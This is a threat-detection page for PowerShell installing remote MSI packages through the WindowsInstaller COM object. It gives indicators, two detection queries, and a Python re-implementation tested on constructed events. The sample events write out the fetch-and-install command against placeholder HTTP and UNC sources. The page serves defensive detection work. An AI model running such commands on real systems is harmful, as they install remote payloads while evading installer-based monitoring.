PowerShell MSI Install Via WindowsInstaller COM From Remote Location

    Date: 06/26/2025

    Severity: Medium

    Summary

    PowerShell MSI Install Via WindowsInstaller COM From Remote Location refers to the use of PowerShell to install MSI packages through the WindowsInstaller.Installer COM object when the package is fetched from a remote source (an HTTP URL or a UNC path). Attackers may use this technique to deploy malware or move laterally while evading detections that key on the standard installer, msiexec.exe.

    Indicators of Compromise (IOC) List

    Image:
        '\powershell_ise.exe'
        '\powershell.exe'
        '\pwsh.exe'

    OriginalFileName:
        'PowerShell_ISE.EXE'
        'PowerShell.EXE'
        'pwsh.dll'

    CommandLine (required):
        '-ComObject'
        'InstallProduct('

    CommandLine (remote source, either):
        'http'
        '\\\\'

    CommandLine (excluded, loopback sources):
        '://127.0.0.1'
        '://localhost'

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    ((resourcename = "Windows Security" AND eventtype = "4688") AND (processname like "PowerShell_ISE.EXE" OR processname like "PowerShell.EXE" OR processname like "pwsh.dll") AND (commandline not like "://127.0.0.1" AND commandline not like "://localhost") AND (commandline like "-ComObject" AND commandline like "InstallProduct(") AND (commandline like "http" OR commandline like "\\\\"))

    Detection Query 2:

    technologygroup = "EDR" AND (processname like "PowerShell_ISE.EXE" OR processname like "PowerShell.EXE" OR processname like "pwsh.dll") AND (commandline not like "://127.0.0.1" AND commandline not like "://localhost") AND (commandline like "-ComObject" AND commandline like "InstallProduct(") AND (commandline like "http" OR commandline like "\\\\")
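    Both queries encode the same condition set. The Python below re-implements that logic and runs it over constructed process-creation records so the include and exclude branches can be exercised offline. This is an added example, not code from the Gurucul page or from the referenced Sigma rule; the field names (Image, OriginalFileName, CommandLine) follow the IOC list, and every hostname and path in the sample records is a placeholder.

```python
"""Re-implementation of the two detection queries above (added example, not Gurucul or Sigma code)."""

# Indicator values from the page's IOC list, lower-cased for case-insensitive matching
IMAGE_SUFFIXES = ("\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe")
ORIGINAL_FILE_NAMES = ("powershell_ise.exe", "powershell.exe", "pwsh.dll")
REQUIRED_TOKENS = ("-comobject", "installproduct(")
REMOTE_TOKENS = ("http", "\\\\")  # URL scheme or UNC path (two literal backslashes)
LOOPBACK_EXCLUSIONS = ("://127.0.0.1", "://localhost")


def is_powershell_host(event: dict) -> bool:
    """True when the image path or the PE OriginalFileName names a PowerShell host."""
    image = event.get("Image", "").lower()
    ofn = event.get("OriginalFileName", "").lower()
    return image.endswith(IMAGE_SUFFIXES) or ofn in ORIGINAL_FILE_NAMES


def matches_remote_msi_install(event: dict) -> bool:
    """Mirror of the query: PowerShell host, COM InstallProduct( call, remote source, no loopback."""
    if not is_powershell_host(event):
        return False
    cmd = event.get("CommandLine", "").lower()
    if any(token in cmd for token in LOOPBACK_EXCLUSIONS):
        return False
    if not all(token in cmd for token in REQUIRED_TOKENS):
        return False
    return any(token in cmd for token in REMOTE_TOKENS)


def detect(events) -> list:
    """Ids of the events the rule would alert on, in input order."""
    return [e["id"] for e in events if matches_remote_msi_install(e)]


# Constructed sample records (Sysmon-style fields); hosts and paths are placeholders.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
COM_CALL = "(New-Object -ComObject WindowsInstaller.Installer).InstallProduct('{}')"
SAMPLE_EVENTS = [
    {"id": 1, "Image": PS, "OriginalFileName": "PowerShell.EXE",  # HTTP source: alert
     "CommandLine": 'powershell.exe -c "' + COM_CALL.format("http://example.invalid/pkg.msi") + '"'},
    {"id": 2, "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "OriginalFileName": "pwsh.dll",
     "CommandLine": 'pwsh.exe -c "' + COM_CALL.format("\\\\fileserver\\share\\pkg.msi") + '"'},  # UNC: alert
    {"id": 3, "Image": PS, "OriginalFileName": "PowerShell.EXE",  # loopback source: excluded
     "CommandLine": 'powershell.exe -c "' + COM_CALL.format("http://localhost:8080/pkg.msi") + '"'},
    {"id": 4, "Image": PS, "OriginalFileName": "PowerShell.EXE",  # local file: no remote token
     "CommandLine": 'powershell.exe -c "' + COM_CALL.format("C:\\Temp\\pkg.msi") + '"'},
    {"id": 5, "Image": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "Cmd.Exe",  # not a PS host
     "CommandLine": 'cmd.exe /c powershell -c "' + COM_CALL.format("http://example.invalid/pkg.msi") + '"'},
]

if __name__ == "__main__":
    print("alerting event ids:", detect(SAMPLE_EVENTS))  # [1, 2]
```

    Only records 1 and 2 alert: record 3 is dropped by the loopback exclusion, record 4 has no remote-source token, and record 5 is not a PowerShell host image.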

    Reference:

    https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml

    Tags: Sigma, PowerShell Attack
